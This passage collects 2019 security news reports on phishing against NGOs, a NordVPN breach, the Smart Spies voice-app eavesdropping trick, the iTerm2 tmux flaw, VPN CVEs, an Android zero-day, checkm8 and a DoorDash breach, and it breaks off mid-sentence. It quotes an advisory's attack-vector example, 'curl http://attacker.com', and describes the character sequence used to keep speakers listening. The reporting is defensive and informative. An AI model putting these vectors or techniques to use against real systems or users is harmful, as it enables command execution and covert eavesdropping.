Tech News - Security

A few days ago researchers from the Lookout Phishing AI reported a mobile-aware phishing campaign that targets non-governmental organizations around the world including UNICEF, a variety of United Nations humanitarian organizations, the Red Cross and UN World Food, etc. The company has also contacted law enforcement and the targeted organizations. “The campaign is using landing pages signed by SSL certificates, to create legitimate-looking Microsoft Office 365 login pages,” Threatpost reports. According to the Lookout Phishing AI researchers, “The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.” The researchers have also detected very interesting techniques used in this campaign. It quickly detects mobile devices and logs keystrokes directly as they are entered in the password field. Simultaneously, the JavaScript code logic on the phishing pages delivers device-specific content based on the device the victim uses. “Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception,” Jeremy Richards, Principal Security Researcher, Lookout Phishing AI wrote in his blog post. Further, the SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. The Lookout researchers said that currently, six certificates are still valid. They also suspect that these attacks may still be ongoing. Alexander García-Tobar, CEO and co-founder of Valimail, told Threatpost via email, “By using deviously coded phishing sites, hackers are attempting to steal login credentials and ultimately seek monetary gain or insider information.” To know more about this news in detail, read Lookout’s official blog post. UK’s NCSC report reveals significant ransomware, phishing, and supply chain threats to businesses A new Stuxnet-level vulnerability named Simjacker used to secretly spy over mobile phones in multiple countries for over 2 years: Adaptive Mobile Security reports Smart Spies attack: Alexa and Google Assistant can eavesdrop or vish (voice phish) unsuspecting users, disclose researchers from SRLabs

NordVPN, a popular Virtual Private Network revealed that it was subject to a data breach in 2018. The breach came to light a few months ago when an expired internal security key was exposed, allowing anyone outside the company unauthorized access. NordVPN did not inform users then as they wanted to be "100 percent sure that each component within our infrastructure is secure." Details of the breach were traced back to March 2018 when one of NordVPN’s data centers in Finland, from whom they rent their servers from showed signs of unauthorized access. The attacker gained access to the server by exploiting an unsecured remote management system by the provider. In a press release statement, NordVPN explained "only 1 of more than 3000 servers we had at the time was affected." and that the company immediately terminated its contract with the data center provider after it learned of the hack. Even though the company had intrusion detection systems installed to find data breaches, it could not predict a remote data management system left by the data center provider. On the other hand, NordVPN said it was unaware that such a system existed. The company also said, "We are taking all the necessary means to enhance our security. We have undergone an application security audit, are working on a second no-logs audit right now, and are preparing a bug bounty program." They further added, "We will give our all to maximize the security of every aspect of our service, and next year we will launch an independent external audit ... of our infrastructure to make sure we did not miss anything else." NordVPN said that the attacker did not gain access to activity logs, user-credentials, or any other sensitive information. NordVPN maintains what it says is a strict "zero logs" policy. "We don’t track, collect, or share your private data," the company says on its website. In a statement to TechCrunch, NordVPN spokesperson Laura Tyrell said, “The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.” She further added, “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.” Based on a few records posted online, other VPN providers such as TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. Users are furious that NordVPN did not inform them on time. https://twitter.com/figalmighty/status/1186566775330066432 https://twitter.com/bleepsec/status/1186557192549404672 To know more about this news in detail, you can read NordVPN’s complete press release. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants StockX confirms a data breach impacting 6.8 million customers Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator

In a new study security researchers from SRLabs have exposed a serious vulnerability - Smart Spies attack in smart speakers from Amazon and Google. According to SRLabs, smart speaker voice apps - Skills for Alexa and Actions on Google Home can be abused to eavesdrop on users or vish (voice-phish) their passwords. The researchers demonstrated that with Smart Spies attack they can get these smart speakers to silently record users or ask their Google account passwords by simply uploading a malicious software disguised as Alexa skill or Google action. The SRLabs team added "�. " (U+D801, dot, space) character sequence to various locations inside the backend of a normal Alexa/Google Home app. They tell a user that an app has failed, insert the "�. " to induce a long pause, and then prompt the user with the phishing message after a few minutes. This tricks users into believing the phishing message has nothing to do with the previous app with which they interacted. Using this sequence, the voice assistants kept on listening for much longer than usual for further commands. Anything the user says is then automatically transcribed and can be sent directly to the hacker. This revelation of Smart Spies attack is unsurprising considering Alexa and Google Home were found phishing and eavesdropping before. In June of this year, two lawsuits were filed in Seattle that allege that Amazon is recording voiceprints of children using its Alexa devices without their consent. Later, Amazon employees were found listening to Echo audio recordings, followed by Google’s language experts doing the same. SRLabs researchers urge users to be more aware of Smart Spies attack and the potential of malicious voice apps that abuse their smart speakers. They caution users to be more aware of third-party app sources while installing a new voice app on their speakers. Measures suggested to Google and Amazon to avoid Smart Spies attack Amazon and Google need to implement better protection, starting with a more thorough review process of third-party Skills and Actions made available in their voice app stores. The voice app review needs to check explicitly for copies of built-in intents. Unpronounceable characters like “�. “ and silent SSML messages should be removed to prevent arbitrary long pauses in the speakers’ output. Suspicious output texts including “password“ deserve particular attention or should be disallowed completely. In a statement provided to Ars Technica, Amazon said it has put new mitigations in place to prevent and detect skills from being able to do this kind of thing in the future. It said that it takes down skills whenever this kind of behavior is identified. Google also told Ars Technica that it has review processes to detect this kind of behavior, and has removed the actions created by the security researchers. The company is conducting an internal review of all third-party actions, and has temporarily disabled some actions while this is taking place. On Twitter people condemned Google and Amazon and cautioned others not to buy their smart speakers. https://twitter.com/ClaudeRdCardiff/status/1186577801459187712 https://twitter.com/Jake_Hanrahan/status/1186082128095825920 For more information, read the blog post on Smart Spies attack by SRLabs. Google’s language experts are listening to some recordings from its AI assistant Amazon’s partnership with NHS to make Alexa offer medical advice raises privacy concerns and public backlash Amazon is being sued for recording children’s voices through Alexa without consent

Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all the versions of iTerm2, the GPL-licensed terminal emulator for macOS. The security vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS) which delivers security audits for open source technologies. Mozilla and the iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in the iTerm2 version 3.3.6. Read Also: MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was the iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years. An attacker can exploit this vulnerability (CVE-2019-9535) by producing a malicious output to the terminal using commands on the targeted user’s computer or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended all the users to upgrade their iTerm2 to the latest 3.3.6 version. The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, the complete resolution to this vulnerability is not yet available. Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)” Visit the Mozilla blog for more details about the vulnerability. Apple’s MacOS Catalina in major turmoil as it kills iTunes and drops support for 32 bit applications Apple iPadOS now available for download with Slide Over and Split View, Home Screen updates, new capabilities to Apple Pencil and more Apple releases Safari 13 with opt-in dark mode support, FIDO2-compliant USB security keys support, and more! The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack

Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and include “a means for lawful access to the content of communications to protect our citizens.” The open letter is addressed to Mark Zuckerberg, Facebook’s CEO and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton. This open letter to Facebook comes after the launch of a new “UK-US Bilateral Data Access Agreement.” This agreement aims to speed up electronic data access requests by their respective law enforcement agencies. This replaces the current process called Mutual Legal Assistance that requires law enforcement agencies to submit a request and get it approved by central governments, which can often take months or even years. The new process will only take a few weeks or even days. Why the US, UK, and Australian governments are against end-to-end encryption The three governments stated that though they realize the importance of strong encryption in processing services such as banking and commerce, end-to-end encryption would hinder the investigation of serious crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.” The letter does praise Facebook of reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), which was more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify the 99% of the content Facebook takes action against, both for child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.” This is not the first time government officials have shown their dislike with end-to-end encryption. In 2017, Amber Rudd, the UK's home secretary said after WhatsApp added end-to-end encryption, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data. Read also: “Five Eyes” call for backdoor access to end-to-end encryption to tackle ‘emerging threats’ despite warnings from cybersecurity and civil rights communities The government has listed the following steps for Facebook and other similar companies: The system should be designed in such a way that the companies behind them are able to effectively act against any illegal content without hampering the safety of others. Allow law enforcement to get lawful access to content in a readable and usable format. Engage in consultation with governments and let those consultations influence companies’ design decisions. The proposed changes should not be implemented until the safety of users is fully ensured by tested and operational systems. What privacy experts and users think about this open letter to Facebook Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” associated with introducing backdoors. https://twitter.com/EFF/status/1180978792052998145 The open letter to Facebook also did not sit well with several users. In a discussion on Hacker News users expressed that it would be wrong to undermine the security for millions of law-abiding users in order to investigate the wrongdoers. A user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be away. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)” Read the open letter to Facebook for more details. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices How has ethical hacking benefited the software industry Cryptographic key of Facebook’s Free Basics app has been compromised Facebook must face privacy class action lawsuit, loses facial recognition appeal, U.S. Court of Appeals rules

Last week, the National Cyber Security Centre (NCSC) reported that they are investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities in VPN products. These VPN products are from vendors like Pulse secure, Palo Alto and Fortinet. It is an ongoing activity, targeted to the UK and other international organizations. According to NCSC, affected sectors include government, military, academic, business and healthcare. Vulnerabilities exist in several SSL VPN products As per the report, vulnerabilities exist in several SSL VPN products that can allow an attacker to retrieve arbitrary files containing authentication credentials. An attacker can use these stolen credentials to connect to the VPN and change configuration settings or connect to further internal infrastructure. The report also highlights that unauthorized connection to a VPN can provide the attacker with the privileges needed to run secondary exploits aimed at accessing a root shell. Read Also: MITRE’s 2019 CWE Top 25 most dangerous software errors list released Top Vulnerabilities in VPN exploited by APTs The highest-impact vulnerabilities known to be exploited by APTs are listed below: Pulse Connect Secure: CVE-2019-11510: Pre-auth arbitrary file reading CVE-2019-11539: Post-auth command injection Fortinet: CVE-2018-13379: Pre-auth arbitrary file reading CVE-2018-13382: Allows an unauthenticated attacker to change the password of an SSL VPN web portal user CVE-2018-13383: Post-auth heap overflow. This allows an attacker to gain a shell running on the router Palo Alto: CVE-2019-1579: Palo Alto Networks GlobalProtect Portal NCSC suggests that users of these VPN products should investigate their logs for evidence of compromise, especially if the security patches were not applied immediately after their release. Additionally, administrators should look for evidence of compromised accounts in active use, such as anomalous IP locations or times. The report also covers product-specific advice to detect exploitation in VPN connections. Steps to mitigate the vulnerabilities in VPN NCSC provides essential steps to be taken to mitigate the risk of these vulnerabilities. They suggest that owners of vulnerable products should take two steps promptly: Apply the latest security patches released by vendors Reset authentication credentials associated with affected VPNs and accounts connecting through them The most effective way to mitigate the risk of actors exploiting these vulnerabilities is to ensure that the affected products are patched with the latest security updates. Pulse secure, Palo Alto and Fortinet have released patches for these vulnerabilities. NCSC also emphasizes on reporting any current activity related to these threats at incidents@ncsc.gov.uk where they will offer help and guidance. On Hacker News, this report has gained significant traction and users are discussing the nature of various VPN products and services. One of them commented, “Commercial enterprise VPN products are an open sewer, and there aren't any, from any vendor, that I trust. I don't like OpenVPN or strongSwan, but you'd be better off with either of them than you would be with a commercial VPN appliance. The gold standard, as ever, is Wireguard.” To know more about this report, check out the official NCSC website. An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices 10 times ethical hackers spotted a software vulnerability and averted a crisis A Cargo vulnerability in Rust 1.25 and prior makes it ignore the package key and download a wrong dependency VLC media player affected by a major vulnerability in a 3rd library, libebml; updating to the latest version may help

Google’s Project Zero disclosed a zero-day Android exploit in popular devices from Pixel, Huawei, Xiaomi, and Samsung, last Friday. This flaw unlocks root-level access and requires no or minimal customization to root a phone that’s exposed to the bug. A similar Android OS flaw was fixed in 2017 but has now found its way on newer software versions as well. The researchers speculate that this vulnerability is attributed to the NSO group based in Israel. Google has published a proof of concept which states that it is a kernel privilege escalation which uses a ‘use-after-free’ vulnerability, accessible from inside the Chrome sandbox. How does the zero-day Android exploit work As described in the upstream commit, “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.” Basically, the zero-day Android exploit can gain arbitrary kernel read/write when running locally. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, making Binder as the vulnerable component. Affected devices include Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Huawei P20, Redmi 5A, Redmi Note 5, Mi A1, Oppo A3, Moto Z3, Oreo LG phones, Samsung Galaxy S7, Samsung Galaxy S8, and Samsung Galaxy S9.  This vulnerability was earlier patched in the Linux kernel version 4.14 and above, but without a CVE. Now, the vulnerability is being tracked as CVE-2019-2215. “This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” Project Zero member Tim Willis wrote in the post. Project Zero normally offers a 90-day timeline for developers to fix an issue before making it public, but since this vulnerability was exploited in the wild, it was published in just seven days. In case 7 days elapse or a patch is made broadly available (whichever is earlier), the bug report will become visible to the public. Google said that affected Pixel devices will have the zero-day Android exploit patched in the upcoming October 2019 Android security update. Other OEMs have not yet acknowledged the vulnerability, but should ideally release patches soon. An unpatched security issue in the Kubernetes API is vulnerable to a “billions laugh attack” An unpatched vulnerability in NSA’s Ghidra allows a remote attacker to compromise exposed systems A Cargo vulnerability in Rust 1.25 and prior makes it ignore the package key and download a wrong dependency. New iPhone exploit checkm8 is unpatchable and can possibly lead to permanent jailbreak on iPhones. Google’s Project Zero reveals several serious zero-day vulnerabilities in a fully remote attack surface of the iPhone.

Last week, a potentially serious and unpatched security issue was revealed in the Kubernetes API server GitHub repository by StackRox. The security lapse was due to the parsing of a  Kubernetes API server deployment called YAML (Yet Another Markup Language) which is used for specifying configuration-type information. This security issue makes the cluster’s Kubernetes API service vulnerable to an attack called “billion laughs”. The billion laughs attack is a type of denial-of-service (DoS) attack. The vulnerability has got a CVE-2019-11253, however, the details of the security attack are reserved till the Kubernetes organization makes the security problem public. Kubernetes has not yet released a security patch to fix the underlying vulnerability. StackRox states, “The issue once again serves as a reminder that, like all software, Kubernetes is vulnerable to zero-day exploits. Thus, mere access to your Kubernetes API server should be treated as sensitive, regardless of how tight your application-level authorization policies (i.e., Kubernetes RBAC) are.” Read Also: CNCF-led open-source Kubernetes security audit reveals 37 flaws in Kubernetes cluster; recommendations proposed The Kubernetes cluster’s master and its resources are contacted by the Kubernetes API service which is backed by the Kubernetes apiserver. The Kubernetes apiserver accepts the incoming connections, after checking their authenticity of the entity and then applies the corresponding request handlers. One of the types of payloads that is accepted by the Kubernetes API service is exclusive to the YAML manifests and is concerned with the use of “references”. These references to nodes can be used in nodes that are themselves referenced in other nodes. This nesting of references and its subsequent expansion is the reason behind the current security vulnerability in the Kubernetes API. The Kubernetes apiserver does not perform any input validation on the uploaded YAMLs, and also does not impose hard limits on the size of the expanded file. These non-responsive actions make the Kubernetes apiserver an easy target. Thus, StackRox believes that only a clear fix to the Kubernetes apiserver code can safeguard the Kubernetes GitHub repository from this “billion laughs” attack. Read Also: Kubernetes 1.16 releases with Endpoint Slices, general availability of Custom Resources, and other enhancements StackRox recommends to protect the Kubernetes API server Users should analyze the Role-based access control (RBAC) policies of the Kubernetes to ensure that only reliable entities hold privileged access to a cluster’s resources. The cluster roles must be audited regularly. Users should be cautioned to keep the privileges of entities with low or no trust as unauthenticated users. Users should also disable any anonymous access by passing the --anonymous-auth=false flag to both the API server and the Kubelets. It should be noted that any small information like the API server version or the fact that the Kubernetes API server is running on a particular host can also be a piece of valuable information to the attacker. The Kubernetes API server endpoint should not be exposed to the internet, instead, it should be made secure using network firewalls. The API server access should only be given to trustworthy (private) subnets or VPC networks. Head over to the Stackrox page for more details on the security vulnerability of Kubernetes API. 6 Tips to Prevent Social Engineering How Chaos Engineering can help predict and prevent cyber-attacks preemptively An unpatched vulnerability in NSA’s Ghidra allows a remote attacker to compromise exposed systems GitLab 11.7 releases with multi-level child epics, API integration with Kubernetes, search filter box and more Pivotal open sources kpack, a Kubernetes-native image build service

A report released by antivirus company Emisoft on October 1 sheds light on the increase in ransomware attacks on government and municipal entities. Per the report, in the first nine months of 2019, at least 621 government entities, healthcare service providers and school districts, colleges, and universities were affected by ransomware. Out of these, 68 state, county and municipal entities have been impacted, 491 ransomware attacks were targeted on healthcare providers and there were at least 62 incidents involving school districts and other educational establishments. “There is no reason to believe that attacks will become less frequent in the near future,” said Fabian Wosar, CTO at Emsisoft. “Organizations have a very simple choice to make: prepare now or pay later. Though there is no public dataset available for an estimate, however the Emisoft report estimates the total combined cost of all 621 incidents would be $186,300,000. Winnebago County’s Chief Information Officer, Gus Gentner, recently stated, “Statistics let us know that the average ransomware incident costs $8.1 million and 287 days to recover. We cannot comment on the accuracy of that statement but, if correct, it would put the total cost at more than $5 billion.” Trends identified by the report Cybercriminals are increasingly targeting software commonly used by MSPs and other third-party service providers. The average ransom demand has continued to increase in 2019. Insured entities may be more likely to pay demands which result in ransomware being more profitable than it otherwise would be. Email and attachments and Remote Desktop Protocol continue to be the attack vector of choice. The Emisoft report suggests two workarounds to reduce recovery costs. These workarounds may, in some cases, either completely eliminate the need for a ransom to be paid or enable recovery for significantly less than the amount of the ransom demand. The report also calls on improving coordination and communication channels between the private sector and law enforcement agencies. In sync with the Emisoft report last week, the US Senate passed a bill called the DHS Cyber Hunt and Incident Response Teams Act. Per this bill, the Department of Homeland Security (DHS) will maintain cyber hunt and incident response teams to help private and public entities defend against cyber-attacks such as ransomware attacks. "The Senate passing the DHS Cyber Hunt and Incident Response Teams Act is an important step in protecting Upstate New York school districts from the swaths of ransomware attacks that take hostage the personal information and vital data of our students, school employees and local governments," stated Senator Schumer in a press release. The bill previously passed the House and is expected to be signed into law by the President in the coming months. You can read the full report on Emisoft’s official blog post. New iPhone exploit checkm8 is unpatchable and can possibly lead to permanent jailbreak on iPhones. Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants

Telegram is now joining the blockchain league with Telegram Open Network (TON), Telegram’s blockchain network. TON will integrate blockchain payments to 365 million users of Telegram by the end of October.  Earlier this month, Telegram released half a million lines of code for TON, new documentation, and a beta. According to Decrypt, “If TON delivers on promises of high speeds and decentralization, it’d be the largest blockchain launch in history.”  Regulators raised their voice against Facebook’s Libra  Regulators had raised their voice against Facebook's cryptocurrency, Libra and Libra’s launch has been pushed since it can lead to serious security issues. While Congress has already drafted bills to ban Libra.  Maxine Waters, chairwoman of the Committee on Financial Services said in the letter to Facebook, “It appears that these products may lend themselves to an entirely new global financial system that is based out of Switzerland and intended to rival U.S. monetary policy and the dollar.” It further reads, “This raises serious privacy, trading, national security, and monetary policy concerns for not only Facebook's over 2 billion users, but also for investors, consumers, and the broader global economy.” France is blocking Libra, according to The Independent, Bruno Le Maire, Economy and Finance Minister of France, said, “I want to be absolutely clear: In these conditions, we cannot authorize the development of Libra on European soil.” Regulators need more information on TON, hence unable to judge it Now the question arises, how will TON survive considering regulators’ strict eye. While most of the regulators haven’t added any comments on TON and few others think that more information is needed on TON. A spokesperson from the German Central Bank said, “We do not possess any specific information on TON. That's why we cannot comment on this app.”  A spokesperson from the European Data Protection Supervisor, a regulatory body on privacy said, “There is not much info indeed.” He further added, “Telegram will have to apply the GDPR; no specific TON regulation is needed here. Telegram will have to fulfill all compliance obligations.” These comments from the regulators don’t give any clarity based on TON. Mitja Goroshevsky, CTO of TON Labs pointed out that the lack of interest from regulators is because the Facebook-led Libra Association is quite different than TON. According to Mitja, Libra isn’t decentralized, whereas TON is a decentralized blockchain. Few other regulators think that TON doesn’t violate any laws but might face criticism by certain authorities who protect the financial system. According to others, TON needs to have a model designed wherein it will be responsible for controlling all the validators.  In a statement to Decrypt, Pavel Prigolovko, Vice President, Strategy, TON Labs, said, “TON has to switch from a model where all the validators are controlled by TON itself during the launch, to one where the community controls the majority of the validators.” Prigolovko further added, “This transition depends on the technical availability of the large Gram holders to become validators. There are quite a few technical challenges to become a validator, like setting up a reliable infrastructure with proper processes, scripts [and] monitoring.” TON will require to fulfill KYC details concerning user data Some of the regulators are sceptical about where will the user data get stored as Telegram hasn’t provided enough details regarding the same. As wallets will be linked, it is important to have certain clarity on where the data will be stored. TON will require the KYC details and users will have to follow the KYC regulations. Mitesh Shah, CEO of blockchain analytics company Omnia Markets Inc, said that Telegram has given little information about where and how user data is stored. “There are more users here than on any other chain, and having it stored in a proper place is one of the largest concerns.”  Goroshevsky noted, that neither Telegram nor TON would not require KYC functionality. That said, users will have to adhere to the KYC regulations of individual exchanges when buying or cashing out Grams.  Though KYC details are unique for an individual but this data can be used by the terrorists as few of them use Telegram to promote their campaigns. Users can make fake accounts and misuse the platform to hide the transfer of money.  Last month, Steven Stalinsky of Middle Eastern Media Research Institute told Decrypt about concerns that TON would be exploited by terrorists, who already use Telegram to promote violent campaigns. Even if KYC was implemented, Telegram wouldn’t be able to prevent subversive groups from using fake accounts to hide the transfer of money. On the contrary, according to Goroshevsky, since TON is a decentralized blockchain, it wouldn’t collect user data and it will be transparent. Goroshevsky said, “TON is not collecting user data hence it is not going to store it. TON is a decentralized blockchain and as any such blockchain, it will be fully open and transparent. And of course, that means all transaction details will be public, like on any other public ledger.” Considering the mixed reactions coming from regulators, it would be interesting to see if TON gets approval for its launch or faces the same fate as Facebook’s Libra. To know more about this news in detail, check out Decrypt’s post. Other interesting news in Security 10 times ethical hackers spotted a software vulnerability and averted a crisis New iPhone exploit checkm8 is unpatchable and can possibly lead to permanent jailbreak on iPhones Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT  

Last week, the team behind ZFS released zfs-0.8.2, an advanced file system. This release comes with support for 2.6.32 - 5.3 Linux kernels and comes with a list of changes. What’s new in zfs-0.8.2 The issue regarding the deadlock condition for scrubbing root pools on kernels has been resolved in this release. The team has made QAT related bug fixes. Fixes have been made to the zpool subcommands error message and unsupported options. zfs-dkms .deb package warning in the prerm script has been fixed. zvol_wait script now ignores partially received zvols. New service that waits on zvol links have been created. In etc/init.d/zfs-functions.in arch warning has been removed. Comments have been updated to match code. In this release, ZFS_DEV macro is used instead of literals. Slog test setup has been made more robust. Performance has been improved with the help of dmu_tx_hold_*_by_dnode(). In this release, default zcmd allocation has been increased to 256K. Error text for EINVAL in zfs_receive_one() has been fixed. Few users on Hacker News seem to be happy about this release and the progress made by the team behind zfs, a user commented on Hacker News, “I contributed a few patches to ZFS on Linux about 8 years ago - at a time when it was still very much in its infancy and panic'd when you looked at it in the wrong way. It's incredible how far they've come. We're using ZFS on Linux on about 120 servers at work and it's rock solid. Snapshots are a lifesaver in our day-to-day ops.”  Another user commented, “Always admired ZFS since when it came out. The talks by the creators were so enlightening.” Few others expected a block-pointer rewrite and background dedupe in this release. One of them commented, “Still no block-pointer rewrite?” To know more about this news, check out the official post. Other interesting news in programming Rust 1.38 releases with pipelined compilation for better parallelism while building a multi-crate project Mypy 0.730 releases with more precise error locations, display error codes and more! GNOME Foundation’s Shotwell photo manager faces a patent infringement lawsuit from Rothschild Patent Imaging  

An unnamed iOS researcher that goes by the Twitter handle @axi0mX has released a new iOS exploit, checkm8 that affects all iOS devices running on A5 to A11 chipsets. This exploit explores vulnerabilities in Apple’s bootroom (secure boot ROM) which can give phone owners and hackers deep level access to their iOS devices. Once a hacker jailbreaks, Apple would be unable to block or patch out with a future software update. This iOS exploit can lead to a permanent, unblockable jailbreak on iPhones. Jailbreaking can allow hackers to get root access, enabling them to install software that is unavailable in the Apple App Store, run unsigned code, read and write to the root filesystem, and more. https://twitter.com/axi0mX/status/1178299323328499712 The researcher considers checkm8 possibly the biggest news in the iOS jailbreak community in years. This is because Bootrom jailbreaks are mostly permanent and cannot be patched. To fix it, you would need to apply physical modifications to device chipsets. This can only happen with callbacks or mass replacements.  It is also the first bootrom-level exploit publicly released for an iOS device since the iPhone 4, which was released almost a decade ago. axi0mX had also released another jailbreak-enabling exploit called alloc8 that was released in 2017. alloc8 exploits a powerful vulnerability in function malloc in the bootrom applicable to iPhone 3GS devices. However, checkm8 impacts devices starting with an iPhone 4S (A5 chip) through the iPhone 8 and iPhone X (A11 chip). The only exception being A12 processors that come in iPhone XS / XR and 11 / 11 Pro devices, for which Apple has patched the flaw. The full jailbreak with Cydia on latest iOS version is possible, but requires additional work. Explaining the reason behind this iOS exploit to be made public, @axi0mX said “a bootrom exploit for older devices makes iOS better for everyone. Jailbreakers and tweak developers will be able to jailbreak their phones on latest version, and they will not need to stay on older iOS versions waiting for a jailbreak. They will be safer.” The researcher adds, “I am releasing my exploit for free for the benefit of iOS jailbreak and security research community. Researchers and developers can use it to dump SecureROM, decrypt keybags with AES engine, and demote the device to enable JTAG. You still need additional hardware and software to use JTAG.” For now, the checkm8 exploit is released in beta and there is no actual jailbreak yet. You can’t simply download a tool, crack your device, and start downloading apps and modifications to iOS. Axi0mX's jailbreak is available on GitHub. The code isn't recommended for users without proper technical skills as it could easily result in bricked devices. Nonetheless, it is still an unpatchable issue and poses security risks for iOS users. Apple has not yet acknowledged the checkm8 iOS exploit. A number of people tweeted about this iOS exploit and tried it. https://twitter.com/FCE365/status/1177558724719853568 https://twitter.com/SparkZheng/status/1178492709863976960 https://twitter.com/dangoodin001/status/1177951602793046016 The past year saw a number of iOS exploits. Last month, Apple has accidentally reintroduced a bug in iOS 12.4 that was patched in iOS 12.3. A security researcher, who goes by the name Pwn20wnd on Twitter, released unc0ver v3.5.2, a jailbreaking tool that can jailbreak A7-A11 devices. In July, two members of the Google Project Zero team revealed about six “interactionless” security bugs that can affect iOS by exploiting the iMessage Client. Four of these bugs can execute malicious code on a remote iOS device, without any prior user interaction. Researchers release a study into Bug Bounty Programs and Responsible Disclosure for ethical hacking in IoT ‘Dropbox Paper’ leaks out email addresses and names on sharing document publicly DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants

Today, DoorDash revealed to its users that their platform suffered a major data breach on May 4, 2019, affecting approximately 4.9 million consumers, dashers, and merchants who joined the platform on or before April 5, 2018. When DoorDash became aware of the attack earlier this month they recruited private security experts to investigate it. The investigation revealed that user data was accessed by an unauthorized third party, who is still unknown. The food delivering company has taken preventive actions to block further unauthorized access. Though DoorDash is uninformed of any user passwords being compromised in the breach, they have requested all their users to reset their passwords and use an exclusive password just for DoorDash. In the official blog post, DoorDash has listed the type of user data that might have got compromised in the data breach. Profile information including names, email addresses, delivery addresses, order history, phone numbers, and more. For some customers, the last four digits of their consumer payment cards. However, DoorDash maintains that customers “full credit card information such as full payment card numbers or a CVV was not accessed.” Also, DoorDash confirms that the accessed information is not enough to make any fraudulent charges on the payment card. For some Dashers and merchants, the last four digits of their bank account number. Again DoorDash confirms that the full bank account information was not accessed and the accessed information is insufficient to perform any illicit withdrawals from the bank account. Approximately 1 lakh Dashers driver’s license numbers were also compromised Read Also: DoorDash buys Square’s food delivery service Caviar for $410 million In the blog post, DoorDash says that they have now taken necessary remedial steps to avoid such security breaches by including additional protective security layers around the data, security protocols that govern access to systems and have also enrolled private expertise to identify and repel threats more accurately in the future. Currently, DoorDash is in the process of reaching out to its affected customers. DoorDash has also clarified that the customers who joined the platform after April 5, 2018, 